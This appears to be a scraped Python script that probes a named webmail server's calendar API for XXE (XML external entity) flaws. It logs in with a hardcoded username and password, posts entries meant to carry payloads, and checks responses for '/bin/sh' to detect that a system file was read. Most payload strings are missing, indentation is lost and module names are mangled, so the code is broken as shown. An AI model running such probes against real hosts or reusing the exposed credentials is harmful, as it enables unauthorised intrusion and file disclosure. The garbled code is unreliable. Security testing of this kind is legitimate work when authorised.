import XXE_check
if __name__=="__main__":
try:
check=XXE_check.xxe_check()
#登录
input_url="http://mail.richinfo.cn/"
getLoginUrl="http://mail.richinfo.cn/webmail/login/loginapi.do"
getLoginDict={
'usernumber':"zhangxinxin",
'password':"xinxin123",
'validateCode':"",
'returnurl':"http%3A%2F%2Fmail.richinfo.cn%2Fwebmail%2Flogin%2Flogin.do",
'loginType':"WEB",
'version':"version",
'userid':"zhangxinxin",
'mailType':"0",
'passwordType':"0",
'domain':"richinfo.cn",
'mobileNumber':"zhangxinxin",
'model':"MAIL"
}
check.login(input_url,getLoginUrl,getLoginDict)
sid=check.get_sid()
# print("main_sid=%s"% sid)
#添加用例()
add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid
add_dict1=''.encode("ascii")
#查看
test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid
test_dict=''.encode("ascii")
seqNos1=check.XXE_go(add_url,add_dict1,test_url,test_dict)
print("测试用例为:")
# print(seqNos1)
#删除
del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid
del_dict=('').encode("ascii")
check.del_test(del_url,del_dict)
#添加用例(]>)
add_url="http://mail.richinfo.cn/calendar/s?func=calendar:addCalendar&sid="+sid
add_dict2=']>'.encode("ascii")
#查看
test_url="http://mail.richinfo.cn/calendar/s?func=calendar:getCalendarView&sid="+sid
test_dict=''.encode("ascii")
seqNos2=check.XXE_go(add_url,add_dict2,test_url,test_dict)
print("测试用例为:]>")
# print(seqNos2)
#删除
del_url="http://mail.richinfo.cn/calendar/s?func=calendar:delCalendar&sid="+sid
del_dict=('').encode("ascii")
check.del_test(del_url,del_dict)
except Exception as e:
print(e)
import urllib.request,http.COOKIEjar,re
class xxe_check:
def __init__(self):
self.cj=http.COOKIEjar.COOKIEJar() #获取COOKIE
#引用COOKIE
self.opener=urllib.request.build_opener(urllib.request.HTTPCOOKIEProcessor(self.cj))
self.opener.addheaders=[('Content-Type','application/x-www-form-urlencoded')]
#登录
def login(self,input_url,getLoginUrl,getLoginDict):
resp=self.opener.open(input_url)
postData=urllib.parse.urlencode(getLoginDict);
postData=postData.encode('utf-8')
resp2=self.opener.open(getLoginUrl,data=postData)
#getLoginRespOnse=resp2.read().decode("utf-8")
#print("getLoginResponse:%s"% getLoginResponse)
f=open("COOKIE.txt","w")
for c in self.cj:
# print(c.name,"="*6,c.value)
f.write(c.name+"="+c.value+";")
f.write(c.name+"="+c.value+";"+"\n")
#获取sid
def get_sid(self):
#先从本地读取COOKIE,然后在截取其中sid的值
f=open("COOKIE.txt")
allmsg=f.read()
sid_location=allmsg.find("lang")
# print(sid_location)
sid=allmsg[sid_location+4:sid_location+42]
return sid
#执行XXE用例
def XXE_go(self,add_url,add_dict,test_url,test_dict):
try:
# print("++++++++++++++++++++")
resadd=self.opener.open(add_url,data=add_dict)
# print("*********************************")
for_seqNos=resadd.read().decode("utf-8")
seqNos=for_seqNos[for_seqNos.find("seqNo")+7:for_seqNos.find("seqNo")+10]
# print("for_seqNos:%s"% for_seqNos)
# print("seqNos_test:%s"% seqNos)
if for_seqNos.find("S_OK")>0:
#查看日历
riliresult=self.opener.open(test_url,data=test_dict)
all_msg=riliresult.read().decode("utf-8")
begin_msg=all_msg.find(seqNos)
msg=all_msg[begin_msg:begin_msg+1000]
end_msg=msg.find("}")
print(msg)
if msg[begin_msg:end_msg].find("/bin/sh")>0:
# print(type(seqNos))
print("存在XXE漏洞")
else:
print("不存在XXE漏洞")
else:
print("没有发现XXE漏洞")
#判断seqNOS的值是否为空
if seqNos.strip()=="":
return 0
elif int(seqNos)>0:
return seqNos
except Exception as e:
print(e)
#删除添加的内容
def del_test(self,del_url,del_dict):
res=self.opener.open(del_url,data=del_dict)
if res.read().decode("utf-8").find('"code":"S_OK"')>0:
print("删除成功!")
else:
print("删除失败!")
京公网安备 11010802041100号